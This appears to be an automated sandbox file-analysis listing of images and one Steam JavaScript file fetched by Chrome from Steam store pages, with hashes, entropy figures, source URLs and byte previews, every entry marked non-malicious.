        SHA1:E108FCB07483A90942A7C2E6B0B4C26D01B2C0E5
        SHA-256:BD2A1966909C391756D36142A8CD9B3DA25A193588CA0E31E39F24BF0D2AF0EF
        SHA-512:B65729C05B7F66246845FBACA22213AEE9C8A7FA1CA39D22C227D9EE39C71B374AD8E0C02F924EDE900912E4E9EBC5FF8922A5C2988DDF6BAFF9D79E2BDE29D7
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................E........................!1.A."Qa.q..2B...#R.....3.br...$C.4S.D.....................................3......................!.1A.Qa.".q..2.....#..B.3CR............?...#..q.L.&.(..^=)..#.......a.....1R.&.S>...z...5..m.E..T.F.S.:Y..."........&m.$A.Q.W..M.4..t..k!=.5J\AEH..u[w_3...eB./..z.*..4..P.{....w}N{...........h.Q.G....z..h^F..$....*.yJ......I...!.H......kF.$S.sw,.48.PKl...Z...S...S.q.....O...r(...>..h.0.E.NC.Y]<...qIF..9.fo...H_........x..a.I.oY../r.V(....V...=!.f...1.Z..?.....'...9....}.v..C...J.>l.... =.w...."J....DYgc.P60s.mXKF...h.F5...(.U.....a.I.....N.3.....4.;.XF..<.>......ZC...'r...yw.4........>D.../7..vG..c..O.q$.....XP_.a.7.L..h...o...=".9oV=Z...}9.g6.l..2m#..@....K.?..I.....|.......A..3...yc.. .V.6...i&U].p.s.An~.+..Hp@..?Q.....E.J.}3..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):117325
        Entropy (8bit):7.992123283830642
        Encrypted:true
        SSDEEP:3072:GLwzDq/mycjV8C4C9ET9F6r1M5CEzGo45Ili:QwC/mycjVNFET9IMho
        MD5:FC25365996278C44E5F4D17719754778
        SHA1:C942AFB90C93C59BCA251C037BF0FF203D41EBD0
        SHA-256:523533436EC9BA20FB878A8A20A2216222FD0A657EF475B6E6538AB17F9DDDCB
        SHA-512:9D3241A49B6793BD9C67D818ED1699357A3534D53DA448BBDA20496CFAC91DAC8A3124434A0D43B1510F6A7DDBB9BB9E4FE13A28B16EEE261C87789C885A29B5
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx.d.w...y..~~.}.o..s..0.`...... @. @Jb...].T^{kwk..jKk...*..]T.-I\S.)... ....`.3...i:.9..._.?.s{...?n..............Cq.K:2E*..........U.m.3...*CO5..f...N.e/zZ4(..v.....Z...(%h.(..#M)@H.u..Q..TD.P....#RH....p...D.HI....Y/K&.`....>p.;..\.dc8d}.`.....H[D.1I../x..>.w.Z.......1..b..#.~./..'........K3+....!......?{...+D.1. .C..@.i63z...I....A.(...B&...P......|.?...[..R..r...=..W.omP...(IY.DY?n!.... ..@.....1F...F.I.f.eIU..%..UL."...!..hQ2.t.........":..!.&6gPY.V&..Xe..d.I.....4..R|'V..0...|.k..4...t.`.3+.S...?..p..].<.:....u.u.u.op|~..G^cmc.p+pw.3os....O.bg.R.K....m<.v{.CG.(.dg..+K......BwS....aL..3.g1]...c.b....;^...]m8u!p......f3..6U.k..6c2(.f.@d.Y!..".s.j0`.......?.x.N;.ZO.<ZI .'...)%!D.T8..B.C..@...V.+..t....X....MF\.9]ax.t.....&..BE.s..="w'....8.-a!&,%MJ...J*z:!.......dH .......E....Z.J0......C"%dR.W...lE..VX.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 25 x 25, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1816
        Entropy (8bit):7.335413459481553
        Encrypted:false
        SSDEEP:48:mwqQNn2xkJ3n7OO8oPTFC+6vUycoKGCAHcDsr9CQ:6Y2w72o7Fh68yLdHcYr9CQ
        MD5:C8A9A5322C7A32D42405AEC4ECC91E8C
        SHA1:A6A04E08067EBBC6E9D70361FAD164CAB634BD9D
        SHA-256:02E650004D02B883D1F77E3C9AB18F556D470CC4F41500917D0CDA68EC62D197
        SHA-512:F057B313CE4AEED427AC04B1278A8FFE105843CD0998CAC5E01DDBCD53CAFFCB5584239646A73C40281D671D22C2E163E0FC3F1A589FFF9E9479CAC206EB241B
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/search_icon_btn.png
        Preview:.PNG........IHDR...............c....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D62C327C9D6211E6BC85ED92E7B3F4DB" xmpMM:DocumentID="xmp.did:D62C327D9D6211E6BC85ED92E7B3F4DB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D62C327A9D6211E6BC85ED92E7B3F4DB" stRef:documentID="xmp.did:D62C327B9D6211E6BC85ED92E7B3F4DB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>`......IDATx.U.k.W.?....fg?21..hT.......H-..VQ.-.......`...(>H...R,B.7...t.iM.i01...nv....;....1...M....a...=...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 293x164, components 3
        Category:downloaded
        Size (bytes):17850
        Entropy (8bit):7.97144980176471
        Encrypted:false
        SSDEEP:384:eJF0sJ6qmyUD0t+zBOzDjy2GPffn2LvqkXI8Ofoifc9q81eCf:UF0q6qDUD0t+zSy1ffYvNYlfcYCf
        MD5:0C95BA742ADC944B64C5300CF7C3C7AE
        SHA1:7AB67FF7D7D189022E09EF921B0A51A367750EA1
        SHA-256:4A2D4F9E7894F710FABDC4194166E799E02E14571D31C3C27933FAA9EC485E9C
        SHA-512:A284B7AC751A164FE80AE6ACE4956DCA83459B57AF4FC4F80B41BBA0AAE5D7B2AE7D8AB085DAF40E300A9A55D26976DD28351FCDD9E3BBD58038F5E6B0193890
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie.293x165.jpg?t=1705420839
        Preview:......JFIF.............C....................................................................C.........................................................................%............................................O.........................!..1."AQa..q..2...#$BRs.....%3....Cbr....45DS.ETUct.................................9.....................!..1.AQ.."2aq.B.....#3CRs...%bc...............?.........@QrI......q,..2..w..u?3..bS...........M.....T.3..g...x.a............9..t.......L-Pze..._.`...M..........l.U[..+.......A.IW....).,..S.U..._.....................>..1s.r..._....3i......C..;.l..#...dUw%yG..R}..&g\."...K8.@H.....:".. ...Y.p._.....-.%,.TM...f...._....B..:.b.I.......VM.J...W#...G.<.\...".m ..c..|+.*x.J.LY.b......!.(..3...%r..i<......N...aTJ.W..UB>z..9...s6..I......2...a..WX0..<u2....[jU..O.........T).0K ...[.o...CY.T.1ySD..~[..6a.m......X.....Q.HU.jd7'.z.^...Z....9y..,.O..E.L]*$.4+#...<...-.&...Jc.."m.x...1.'H..0.9.l....1h....e.kP1 .c'_+i.!..et....g....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1500 x 220
        Category:downloaded
        Size (bytes):2748263
        Entropy (8bit):7.930938237591837
        Encrypted:false
        SSDEEP:49152:t5aIe62ofDq1LTvIm6AQyTcTFKxG433a8pJWQ1Wg2Adod0uQ7WOe:twu2LLYAQ2nxG4nakIgJqC7xe
        MD5:8F02A506549F2DAA5D0F6531EBDFB9CF
        SHA1:6BB1DD7627E4BBF4286BDF04331A3602D6772B82
        SHA-256:91CC05C83F0A59380B894BB9212B4A279AC797860286186978D8113B53C7DEAE
        SHA-512:53257BFE42C77812466B792E2B4FC4D341B6959308B00A022DDDA458F9C6959F7C75E09E7AEFB16FEE177ED43C7033571A549C348FE6E3A4E494258E73D9C1EC
        Malicious:false
        Reputation:low
        URL:https://clan.cloudflare.steamstatic.com/images/6313/6bb1dd7627e4bbf4286bdf04331a3602d6772b82.gif
        Preview:GIF89a............$lG8mUB.lM7JB..visd.y4.......rR..%.......u.xhEB6...TWH.....!"(#.M3.y'(B9...592TZRgkc 1).zE..v..2..C.. .)"..g.g4EI?VF6F62%".h6.51(..y.u6.Wz.s.z&.zd...U62.xgJZR.e.'.TE5'..'vkY.WC.wG....W..zT..y..W9RE.z.!..k.I..{.v'......g7WGB..rV2(. ..w{t|aF.j33) ukc..Zkc..i....w.K..ivsY.D.i..j....u...8.!..u4JcT.{Bua4..O._.u...z...4.4........]R:.g%WC(..o.x&.{SF)(..{ivr.S.e]G....<.k3....{s..dhsZGB(.kD.]B.y1VcJ.k'.q..=*U)'.j_.hA......>.D...)GB.{s....?.H..{_.{..Z*..f..+.V.?..{n,..k[.w HR8..1MF.F)1.uG.q8)*.~.T\S'.\.rg.)))fW.V)159BSZcJJJl{}...ckl...1B:)91.....h.kBG..!919B)BRJRcR..o!11JZJZcRckZZcZ.k)BRBJRJkmC9B:ZkZsscRcZ)99*. q{kkkZ0J9{{kccZ9J9..Lc..{sccbR.kB99*1-JRB9B1!99BZLUJJssk1B1lcZp{c{sk|{anaRRk[ckRmkPZkRZsbKZ@/19JcJ.kLRkR.k19JJ?RW..gBJ1...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="h
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 244 x 212, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):3777
        Entropy (8bit):7.855078020337897
        Encrypted:false
        SSDEEP:96:W5Zsk8bb6l5qnCoghGfkm37QP00rqGDXrg/sG3vUx+Iocg2fkjGfkjky:W5H8o5qe0Mu7600WiXE/v3ve+Is2MjGm
        MD5:EABC76EB57FEAE44ADD7FAEAD028521E
        SHA1:4E3E53938FAD15661D2D046A868338841A95DB19
        SHA-256:FC9E6260A2706AE146282D77E67BC1B74688435F8912AB4C1932641EEC28BFFA
        SHA-512:5C6DA6EEEFDDF321C2BC7E39A134E0A3140A9F93AD1560B2E102EF60EC218C29AAE14ED344C79E25CC5493CD15551040D8C909DE28DCAB02034D787563104E07
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...cIDATx..._LTg...w.i........Vmk.6X....i..F..{...^..^4Mz..6ml..nb ]....e.a....v..)...a.E.).#..>.0.3g.Kww8/..'y.g........sf.....W.2.... ...4....@......@...h... ...4....@. ....@...h... ...4....@. ....@...h......2....P^^...sVEE....r..={f.K....I...F#R...g..vN..k...%.Oj..6...h.:"...0......K.E..G..."..@.x..w.*...'."_..A...L.r....I..W........^H...Q...:;..h4j.z..8..,..a/...w.Fm.Meg.C.a.|..w.....u.`.zM.U.=....4e...=.U.....[.h.z..j...Te.a..z...+RUR.8.N.u.INN..o?a........E...o}.#...._....Oc..=.Orr.&.!;;[=..3..q.....?H...0{.S._m.B..(.6.Rm.)...]..%....3..c..Dk.M..z.%.c..NTd...}..90..tj.v.#.L..M.t.uc.<>..3..;..:..G..9..I.....%.@.`..d....@...h.@. ...4`6...M.@'.n......I/z`5>>.K...X7Z.Z.....5.7..h+.N.h....gS...8...........@..Njj.}....'...{`...'T{....mmm'.t2....?V..=C.......=b......`|s.@'zC.N......."..>k...M......)...}....?.r...+z.x....JTII.....4.O_....s..?>W..?.O.....`...t{...r..Z
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):11506
        Entropy (8bit):7.958653271170369
        Encrypted:false
        SSDEEP:192:ueevq6tUA5+/C3RjIX4w/pDhs99XlDI9s1m5uc4KXPsmh7hjcyV0zYELGU:udhtUA5+/CV6dhmUs1mDfs4Vjcc0tiU
        MD5:71D9E8B57744D4B57259C539D11DB462
        SHA1:7C1B6D995752DBFAB77B9C6FC4C73AC23CDA66F1
        SHA-256:3C97321EFB6853A0CEE9019A7CED651E4076F69D521E55094597AE63FA0C3D56
        SHA-512:FC6F37BC6950C451B55E307EDC8A8B5334E79C2557168122832B7642892253E6A12A997ED7C653E1986CB12E07C534E6EB0B7DE2ADD9BAA8E59E4D6E995252D4
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/892970/header_292x136_alt_assets_3.jpg?t=1715688279
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................=........................!..1A.."Qaq.2B.....#....$CR.%34br..................................=.......................!1..AQaq.."......2...#..$3BR.%5br...............?...A^....W..0....D..i.I..h)h<......4..b.8..=..Qq..*.c.....`.........0=Sj...q.........$^b..Rv.N99...$.h.0:7.{`...,..P..`......H.74....@.*.......LPV.....Gz.9{...h.d.I.)*.S...*..".F1.)#D..a..I"F..}.Q.m.(B1....t.R.#.<d_,{.(..Z...E.@............(..........h.B...@!.........*/....6.K..d.@..0(......0n[lc..$8%....-.........(Z..pM.......<.Q.@.Q....N(......[.......X....XX.......NA....Z......mF.`z......3.Q...t.N(T\d.KH4kH.....j........wj.Q.{.. P<h9Fr(...=.....7W.e.w......;.(...y.':t.*q.ke.....f..........n..[.Fh...{[l$..W..m.1..#......J.,h...^....}....v...Y.+L%....y......U.=..}..NP...\.j5A.x....kV.<.Yf..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:dropped
        Size (bytes):13438357
        Entropy (8bit):7.913745056545354
        Encrypted:false
        SSDEEP:196608:2NsJhZeapaXr4X+GuAz9jvQiAiCCMtmkhu0zdBrw67onQue+1jfuEi/:2SAPUuVUISMtmGuMdBrhwbfNC
        MD5:EBC4A98B214B01532362D8D6406F588D
        SHA1:3733A11582592E14A3F3AFB6DD8608F4C009E39F
        SHA-256:F79FB531EAE69661ED295E854BAF59250A2352AE00F8A4E01F5E8FE54664E31B
        SHA-512:2DDAD606F3B4C5EC38AB70F598D018DEBB7D3B8A93CB34128B0D9A1F27DD4E0AD74A3E94AE589418E0C43B5356CECC2A487F99A42D1016963EB9D3CA1C6B54CD
        Malicious:false
        Reputation:low
        Preview:GIF89aj.\...1.............................................!.."..#..&..&..'..,..,..- .-!.....#./ ./&!0(%1$.2!.2+)3--4$.5'.5) 6+%:!.:(.:+ :/*;".;%.;&.;*.<(.>(.>*.>.#?1)?75@*.@..@4+A2$D/.D0.D7-E3.F/.F94HAAI5$I>9J7+JKTKQ_LPWO9*P2.P8.PR[Q>1QB<QFDQPUQT`QWeR=*VTZVU]VXaV]jW9.W<+WB5WKHWZeXA,XPPXW^YF;Yan\W[^B0^[a^]e^ak^dq_> _F._TR_gu`H5`I:`NFcYXdl|e_eefqejxfH3gC"gL5gN=gRGg\[gdjhYSh_^hirjn}kaaldelmxlt.mJ)mP9mSAnXHns.ojqqO2qT?qy.uM(uc\vigvmowpvw{.xY@x\HyR:y[Dyu~zh`zidzz.{aN{..|st}Z4}kg.L(.pn.us.......bI.pi.gS.z~.wt.~.....sj.xr..........hN.xm.|v.c7.gI.o[.lS.vf..|....}u................nF.qR.sV.y^..o.....|........t.....v.yT..}.|]...........q.......zQ..`..~..v........^..........................n.._..............r...........q..............w.....................!..NETSCAPE2.0.....!.......,....j.\...............................................!.."..#..&..&..'..,..,..- .-!.....#./ ./&!0(%1$.2!.2+)3--4$.5'.5) 6+%:!.:(.:+ :/*;".;%.;&.;*.<(.>(.>*.>.#?1)?75@*.@..@4+A2$D/.D0.D7-E3.F/
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x1080, components 3
        Category:dropped
        Size (bytes):124529
        Entropy (8bit):7.79044844464572
        Encrypted:false
        SSDEEP:3072:R24zCBv0a8Oz/fxlnI0Nc49J7g3HOHQZP:R2GCea8OzHfjO85ygs
        MD5:48B805D8FA321668DB4CE8DFD96DB5B9
        SHA1:E0DED2606559C8100EF544C1F1C704E878A29B92
        SHA-256:9A75F8CC40BBE9C9499E7B2D3BAB98A447685A361489357A111479517005C954
        SHA-512:95DA761CA3F99F7808A0148CFA2416B8C03D90859BFF65B396061ADA5A4394FB50E2A4B82986CAAB07BC1FCD73980FE9B08E804B3CE897762A17D2E44935076D
        Malicious:false
        Reputation:low
        Preview:......Exif..II*.................Ducky.......<......Adobe.d.................................................................................................................................................8........................................................................................!.1.A.".Q.a2.B#q..3Rb$........................!..1.AQ"..a2B#.............?..w:2...................................u...h....u.}@ ...0.......[..M)..p.....^.0.7P2@..<.H.>@........^@w.?.d.....@.p.w.....y.\..]:......`..%.&...>.....h...{.|.....O[4Q ]....k..Rg..y....p..jR'..<.\....AS..)..i#..Ps..7UF...d.6...SRb.O..mr.;.R:.......X_.._.sU\}..R..:cC....S...{x%..=.z..yG.[t.S.5.O._.=3.H..|:r.+..7%b.zt+Nc.\c...|.&.K..-.qz..\...O.+u...3.>./.....5...D...*......H.$.&ER@0..o..gW.u.8'N=...N.Y...g.x...PR................>......>.1...W...C\....a..2...%TA...=oWd...ur..Z......&_...*m..?.....O.....Fly.D.D6.r....OK&....H.b...Z...)A.........]Z.U.4VL.&YS../.0p......p......4.*....)....*B.a.3b.A8....V.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 306x260, components 3
        Category:dropped
        Size (bytes):103423
        Entropy (8bit):7.977274936730541
        Encrypted:false
        SSDEEP:3072:4/TlCwue3iuH8dRRmtSup/OjKShL1RaZC1uw+BU:U+e+58p/OmSh67U
        MD5:1F740D31A6CFBEB47BFE7C6EBF257FAF
        SHA1:8B19BC55CF13795548F2C6CD9416016C19C00EFE
        SHA-256:75E9531A69FBE964C8BB64F7923DF7AF92A1D6A7817B0F3DAB1DE259A5C17692
        SHA-512:2B24E346C2E83DC5371F15417E26C08E2E079268BE13DC45D5ECCEAFCBCE6EB5A0FBCF31747ABDC6E40C455703A15CCA7D34EB7152EFDEE0CFB26AE55E16B757
        Malicious:false
        Reputation:low
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:dropped
        Size (bytes):5307
        Entropy (8bit):6.066768712612663
        Encrypted:false
        SSDEEP:96:AvfYtFKIMSxjU72WVBsmGLY0b/Ozwwz5PKIMSxjU72WVBpeIXIosJ:kYt0IOahh9b/OzwwzIIOaEej
        MD5:134BC626CEE2C5B8676648ADA9C51996
        SHA1:F746DA1B20CA9A4ECE15A203AD1C0DA9BAD78C69
        SHA-256:30084160092158D35CD82A46865222CCA9D2D3E9CF388382BDDC86292FF1F118
        SHA-512:BCCB9C642D5F343E38336D35B29584E8B87F28074279B34E33F2EA8E7CF43CDB46528EF5A2837F1A7459C0C7E045B1180919E8D0044218F115E724F47EE18810
        Malicious:false
        Reputation:low
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 24.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" style="enable-background:new 0 0 16 16;" xml:space="preserve">..<style type="text/css">....st0{display:none;}....st1{display:inline;}....st2{fill:#67C1F5;}..</style>..<g id="Layer_2" class="st0">.......<image style="display:inline;overflow:visible;" width="16" height="16" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ..bWFnZVJlYWR5ccllPAAAAyZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdp..bj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6..eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTQ1IDc5LjE2..MzQ5OSwgMjAxOC8wOC8xMy0xNjo0MDoyMiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJo..dHRwOi8vd3d3LnczLm9yZy8xOTk5LzA
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):15501
        Entropy (8bit):5.225110777706095
        Encrypted:false
        SSDEEP:384:2snR/dS0MJCaUruT16VUP+AP03hIMg8IMepcRc8uWNzT7q:NR/dS0MJCaUruT2UP+AsRIMg8IMAUzuV
        MD5:CD4BDC56FA7DC599A60A48CA895272CA
        SHA1:6C2F5B4780EB921FB4A0254A0C46D560EB4FFDDE
        SHA-256:C5025BAB607BDD76AC7E074EBF08595FA8D7F0BEA2BCE94D4D211BAFCD8CF003
        SHA-512:84A03ACA8860B2C4981828D4AB516ACBA849FFB7AA0CE5C30E1C8EDA57C50C94913A32831134876294CC6CB7FE8537EB62FE072211DF769BE432B7A5F5DD3F74
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/cluster.js?v=zUvcVvp9xZmm&l=english
        Preview:..function Cluster( args )..{...this.nCurCap = 0;...this.bInScroll = false;...this.bSuppressScrolling = false;...this.bUseActiveClass = false;...this.rgCapsToLoad = [];...this.onChangeCB = null;.....this.cCapCount = args.cCapCount;...this.nCapWidth = args.nCapWidth;.....if ( args.bUseActiveClass ) {....this.bUseActiveClass = true;...}.....this.nCapsulesToPreload = args.nCapsulesToPreload || 1;.....this.elClusterArea = $JFromIDOrElement( args.elClusterArea );...this.elScrollArea = args.elScrollArea ? $JFromIDOrElement( args.elScrollArea ) : this.elClusterArea.find('.cluster_scroll_area');...this.elScrollLeftBtn = args.elScrollLeftBtn ? $JFromIDOrElement( args.elScrollLeftBtn ) : this.elClusterArea.find('.cluster_control_left');...this.elScrollRightBtn = args.elScrollRightBtn ? $JFromIDOrElement( args.elScrollRightBtn ) : this.elClusterArea.find('.cluster_control_right');...this.onChangeCB = args.onChangeCB;.....this.elSlider = $JFromIDOrElement( args.elSlider );...this.elHandle = args.e
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):2733
        Entropy (8bit):7.784003064465458
        Encrypted:false
        SSDEEP:48:vhqnAmopEVAtBt2YgYG833N4vGFvXlXF6PCAoQ1nE1T85i2H4r3:vQnAnBIVDvSlVuCA7E1T8Y26
        MD5:B71F42F3168B16957C8393EFB6B68221
        SHA1:6215711F6C95E61E5F211C5952A9A9CFA6604372
        SHA-256:55E5E3F5F947D0C603508241AD655B6437AA0AE961CADE3A822097044815B23F
        SHA-512:ED80B4F7ADCE853921520D333550951530AD5C10C1BAF57F3ADADAF95225D269A874EA34FADF089E756D0617C709532E85AE4EF45C3A85C18A63336D1D5D53CD
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................:........................!..1.AQaq."2....#...34Bbrs$5R..................................*.......................!1..AQ"2..BqCa...............?..l.......w...;T!.;..B......X\i.....d.S....g.c^...cq.p.Z..:b..Y..X...t..c.95..o''....X..{o..x<W......5.M..g....e..W....R|...Z....b..n...|(.X@..p.'.. n..kW.(.P@&...t...cV.e..zL=9.......g......L..I.>>J..e.....m\..;..F.D..G6}@5.....P..T......wQ!.Cn..@.i.m...l.DVZ...{.F..(.....4.SN....v...-.....[..Rs.....T..3c.9..X!.<.......wV._.._...~.K.L.......z..[.g.........vi.P}i..M/es........Zl|..k.1..D..NF....*.....Sg...7.8......(.w.<.`7.s...:9q...]..s.n....p.~t.<..q...C}.Mr$..l..9c...N\.c...]EaE@...j..m,....Y.$.!'.S.TT Lr..*.x.P.m.=......n2...B..cB..5H.c.Y. ....7..})'=.)].\...S....~U.U). ..;.g....w&.M.-.J.5V......9Q.>.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 320 x 32, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6719
        Entropy (8bit):7.901529029287266
        Encrypted:false
        SSDEEP:192:5hA6M4WnkyWwqmnHAXF50kzSvF3eIoAOpyj:5yvnkyTnhv8AOgj
        MD5:49B920CA1495FC302A0ED1515CE53491
        SHA1:6CCE254202C4DC378CF31AAA7D05C8538267F078
        SHA-256:472165755644972C17E4BBAF1300926AB99724D95599415B2EA7F9C16A27737C
        SHA-512:F25A18A9433F4CAF2106D2D95CC4CB58C053395AE7341EEF0CD143134F10A00C6AFE7301B0EC58D57705641B42F1375D9BA8491C823DAB804D48AA8B75F4AAB8
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...@... .....c..D....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8C87CFB10319E411A236C2B21919E765" xmpMM:DocumentID="xmp.did:9BC4BE959C4B11E4A75E88529746DCED" xmpMM:InstanceID="xmp.iid:9BC4BE949C4B11E4A75E88529746DCED" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4328D7F2BF9AE41194B9DA16F2E1AD04" stRef:documentID="xmp.did:8C87CFB10319E411A236C2B21919E765"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.p.....oIDATx..]....~=........:.1..$...*...BP....G
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 1057 x 453, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):134600
        Entropy (8bit):7.975500968858445
        Encrypted:false
        SSDEEP:3072:CUnFasOIVyHQCFbeIxsaFHePkAq+y0I7TMOE9A4B:DnFLOIpnYhAq+y0UMnA2
        MD5:ED96AF112AE58CC87D257E3A15A15058
        SHA1:2FB2963CA13D8E2DFF6BC71E9EAD9B0FDC686CD0
        SHA-256:FC76B07C4A37F312FF1883EFEFC994E48BFC407942ABBE823D665D46C2A883D2
        SHA-512:16ADB69862AF3C24CBF37BE97C366D441112222FB4F39938295E89CEE92344914C346F5672D146A1EDF0008EED491EB66CD91615318374A4A9E12598EE48224E
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/home/cluster_bg.png?v=1
        Preview:.PNG........IHDR...!................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. 